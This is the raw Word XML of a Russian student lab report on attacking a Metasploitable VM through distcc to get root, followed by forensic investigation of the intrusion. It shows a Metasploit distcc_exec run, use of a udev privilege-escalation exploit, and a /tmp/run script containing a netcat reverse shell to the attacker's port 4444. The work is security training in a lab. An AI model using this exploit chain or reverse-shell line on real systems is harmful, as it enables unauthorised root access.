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Тыщенко Леонид Михайлович, 11-902 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторная работа №1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование DISTCC для получения прав root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание виртуальной машины Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Была создана виртуальная машина Kali Linux с требуемой конфигурацией</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Настройка сети между Metasploitable и Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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Были получены и записаны ip для Metasploitable и Kali Linux, проверена доступность друг друга командой ping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:keepNext w:val="1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:before="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="9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дальнейшие действия проводятся на Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Атака Metasploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">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Сканирование портов Metasploitable с помощью NMAP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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Просканированы порты Атакуемой системы (Metasploitable) с помощью команды nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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distcc запущен на порту 3632 (grep 3632 /var/tmp/scan.txt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">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Запуск эксплоита distcc используя Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">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запущен фреймворк Metasploit для атаки на систему;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">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проведён поиск distcc эксплоита командой search distcc для получение доступа к атакуемой системе;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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запущен эксплоит: exploit/unix/misc/distcc_exec.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">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Выбор и настройка дополнительного загрузчика для эксплоита distcc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">В качестве загрузчика эксплоита был выбран ruby сервер и установлен адрес системы, на которую планируется атака</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">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Получение доступа к Metasploitable.</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Подключение к системе с помощью загрузчика эксплоита</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">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Скачивание эксплоита </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit-8572.</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NETLINK – протокол для обмена информацией между пространствами ядра и пользователя. Он состоит из стандартного сокет-подобного интерфейса для процессов пространства пользователя и внутренних API для модулей ядра.</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эксплоит позволяет подделывать сообщения протокола NETLINK 1.4.1 (включительно), поскольку протокол не проверял произошло ли сообщение от пространства ядра или нет, позволяя тем самым повышать привилегии посылая сообщения из пространства пользователя.</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скачан эксплоит из базы эксплоитов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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Создание netcat сессии для удаленного управления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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открыт порт 4444 для прослушивания входящих подключений на атакующей системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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Использование </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit-8572 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">для предоставления удаленной консоли с правами root по netcat.</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скрипт, запускаемый на атакуемой системе для подключение к атакующей системе:</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'#!/bin/sh' &gt; /tmp/run;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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echo '/bin/netcat -e /bin/sh KL_IP 4444' &gt;&gt; /tmp/run;</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запустить скрипт с имитацией, что процесс является родительским для менеджера.</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выполнения эксплоита менеджер устройств udev создаст блочное устройство с правами root, которое в свою очередь выполняет скрипт /tmp/run. В результате для атакующей машины будет предоставлена консоль(удаленный доступ) на порту 4444 с правами root. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Форензика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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Выявление аномальной активности. Привязывание сетевых подключений к идентификаторам процессов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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выполнить команду netstat –noap | less;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разделе tcp соединений мы видны прослушивающиеся и установленные соединения на данный момент.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Присутствуют неизвестные соединения с ip адреса 192.168.164.1298, использующие порт 4444. За первое соединение отвечает процесс 2770 на котором выполняется shell (далее SH_PID). За второй процесс 2769 на котором выполняется ruby (далее RUBY_PID).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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выполнить команды:</w:t>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-eaf | grep RUBY_PID | grep -v grep;</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-eaf | grep SH_PID | grep -v grep;</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 RUBY_PID выполняет простой скрипт, запускающий сервер и предоставляющий сокет для приема и команд и выполнения в терминале.</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 SH_PID представляет собой обычный shell, запущенный некоторым родительским процессом с правами root. При просмотре информации о родительском процессе командой: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="62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-eaf | grep P_SH_PID | grep -v grep; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="62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P_SH_PID – pid родительского процесса SH_PID,</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видим, что он был запущен /tmp/run скриптом от init процесса с наивысшими привилегиями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="62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lsof | grep 4444;</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RUBY_PID запущен с правами демона, в то время как SH_PID с правами root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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Используем lsof для анализа демона с процессом RUBY_PID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">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команду lsof –p RUBY_PID;</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Необычная активность на порту 4444 идущая от Metasploitable до Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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Используем lsof для анализа netcat сессии c процессом SH_PID и root правами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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команду lsof –p SH_PID;</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Видны установленные соединения с правами root, идущие от Metasploitable до Kali Linux, что является ненормальным.</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Используем ps для анализа netcat сессии с процессом SH_PID и root правами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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выполнена команду ps -eaf | grep -v grep | grep SH_PID;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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выведен результат команды ps -eaf | grep -v grep | grep P_SH_PID;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">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командой cat /tmp/run выведено содержимое скрипта предоставившего shell удаленной машине.</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выводе скрипта видно, что клиент netcat подключился к серверу 192.168.164.129:4444 и предоставил ему /bin/sh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание дампа памяти с помощью LiME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">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Подготовка директории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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каталог /var/www/distcc командой mkdir –p /var/www/distcc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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смените владельца директории командой chown www-data:www-data /var/www/distcc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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измените права доступа командой chmod 755 /var/www/distcc;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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подтвердите правильность выполнения командой ls -ld /var/www/distcc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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Создание дампа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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перейдите в каталог /var/tmp/src  командой cd /var/tmp/src;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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выполнить создание дампа оперативной памяти Metasploitable c помощью команды: insmod ./lime-2.6.24-16-server.ko "path=/var/www/distcc/distcc_memory.lime format=lime";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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убедиться в создании дампа командой ls -l /var/www/distcc/distcc_memory.lime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание файлов для форензического анализа.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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Сохранение сведений о системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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перейти в каталог / командой cd /;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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сохранены  сведения о состоянии сетевых соединений и слушаемых на данном компьютере портах командой netstat -naop &gt; /var/www/distcc/distcc_netstat.txt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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сохранен вывод информации используюемых файлах процессами в системе командой lsof &gt; /var/www/distcc/distcc_lsof.txt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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сохранен отчёт о работающих процессах командой ps -eaf &gt; /var/www/distcc/distcc_pseaf.txt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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заархивировать все данные командой tar zcvf /var/www/distcc/tmp.tar.gz /tmp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="360" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание MD5 хеш-суммы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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MD5 хеш-сумм командой md5sum * | tee distcc_md5.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="624"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">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0" w:firstLine="454"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="624"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="454"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="454"/>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